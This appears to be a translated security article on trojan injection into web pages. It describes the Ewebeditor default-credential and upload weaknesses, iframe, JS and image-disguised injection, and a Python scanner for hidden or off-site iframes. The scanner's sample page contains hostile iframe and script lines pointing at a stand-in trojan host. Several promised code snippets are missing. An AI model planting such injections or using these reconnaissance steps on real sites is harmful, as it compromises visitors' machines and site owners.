Web page trojan injection (literally "horse hanging") is a habitual intrusion technique for attackers, and its impact is severe: it embarrasses the site's administrators and harms the site's visitors as well. Whether you maintain a site or are an individual user, you need to understand how these injections work and how to defend against them.
1. About web page trojan injection
In a web page trojan injection, an attacker inserts a piece of code into a normal page (usually the home page of a website). When a browser opens the page, the code executes, then downloads and runs the server component of a trojan to take control of the visitor's host.
2. Getting a webshell
To inject a trojan into a web page, the attacker must have permission to modify the site's files, and obtaining a webshell on the site is the most common way to get it.
In fact, attackers have many more avenues to exploit, such as injection, cross-site attacks, side-note attacks, upload flaws, database exposure (Bauku), and program vulnerabilities. The upload vulnerability in the currently popular Ewebeditor online HTML editor serves here as a demonstration and analysis.
1). Website intrusion analysis
Ewebeditor is an online HTML editor that many websites integrate to make publishing information easier. Older versions of Ewebeditor have an upload vulnerability, which hackers use to obtain a webshell (web management rights), modify the site, and inject the trojan.
The principle is that the default Ewebeditor administrator page has not been changed, and neither have the default user name and password. After logging on to Ewebeditor, the attacker adds a new style type, sets the allowed upload file types to include the ASP file type, and can then upload a web trojan.
2). Identifying and analyzing web page vulnerabilities
(1). Attackers generally determine whether a site uses Ewebeditor by browsing the site's pages or by searching search engines for strings similar to "ewebeditor.asp?id="; if such strings exist, the site can be judged to use the editor.
(2). Security weaknesses in the Ewebeditor editor that hackers may exploit:
A. The administrator has not changed the path and name of the database, so a hacker can use the editor's default path to download the site database directly.
B. The administrator has not changed the editor's back-end management path, so a hacker can log in with the user name and password obtained from the database, or with a default password, and go directly into the editor's back end.
C. The Web editor's upload program has a security vulnerability.
The analysis reports that a Web trojan, cer.asp, was found in the site's admin path and was identified on analysis as the "veterans" Web trojan. (Even after encryption it can still be identified through its signature code. Webmasters are advised to use Reiche ASP webmaster Security Assistant and to check often whether the site has been illegally modified.)
3. The most important trojan injection techniques
(1). Iframe injection
Here the attacker uses an IFRAME statement that loads the Web trojan and that executes when placed in any Web page. It is the earliest and most effective of the trojan injection techniques. The usual injection code is as follows:
Explanation: opening a page that contains the inserted code also opens the http://www.xxx.com/muma.html page, but because its height and width are both "0" it is very hard to notice and very covert.
(2). JS script injection
JS injection hides the Web trojan by exploiting the way pages call JS script files: the hacker first creates a .js file, then uses JS code in the page to call it. The usual code is as follows:
http://www.xxx.com/gm.js is a JS script file that invokes and executes the trojan's server component. These JS files can usually be generated by a tool; the attacker only needs to enter the relevant options.
(3). Image-disguised injection
As antivirus technology develops, attack methods are constantly updated too, and image trojans are a newer technique for evading antivirus monitoring. The attacker hides trojan code such as http://www.xxx.com/Test.htm in a test.gif image file. These images with embedded code can be generated by a tool; the attacker only needs to enter the relevant options. After the image trojan is generated, code is used to call and execute it. It is a relatively novel and well-concealed injection method.
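A site maintainer can check the site's own pages for the first two techniques above, the zero-size iframe and the externally hosted script. The following scanner is an added example, not code from the original article; the host www.example.org, the sample page and the reason labels are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ZERO = {"0", "0px", "0%"}
ZERO_DIM = re.compile(r"(?<![\w-])(width|height):0(?:px|%)?(?:;|$)")

class InjectionScanner(HTMLParser):
    """Flags hidden iframes and off-site iframe/script sources in one page."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (line number, reason, src)

    def _offsite(self, src):
        host = urlparse(src).hostname  # None for relative URLs
        return host is not None and host.lower() != self.site_host

    @staticmethod
    def _hidden(attrs):
        dims = [(attrs.get(k) or "").strip().lower() for k in ("width", "height")]
        style = (attrs.get("style") or "").replace(" ", "").lower()
        return (all(d in ZERO for d in dims)
                or "display:none" in style or "visibility:hidden" in style
                or set(ZERO_DIM.findall(style)) == {"width", "height"})

    def handle_starttag(self, tag, attr_list):
        attrs = dict(attr_list)
        src = (attrs.get("src") or "").strip()
        line = self.getpos()[0]
        if tag == "iframe" and self._hidden(attrs):
            self.findings.append((line, "hidden-iframe", src))
        elif tag in ("iframe", "script") and src and self._offsite(src):
            self.findings.append((line, "offsite-" + tag, src))

def scan(html, site_host):
    """Return the findings for one page's HTML, in document order."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page; www.example.org is a hypothetical site host.
SAMPLE = """<html><body>
<script src="/js/menu.js"></script>
<iframe src="/ads/banner.html" width="468" height="60"></iframe>
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>
<script src="http://www.xxx.com/gm.js"></script>
</body></html>
"""
```

Running it regularly over the site's files and comparing the findings against a known-good list of third-party hosts shows when a page has been modified; it does not cover the image-disguised variant.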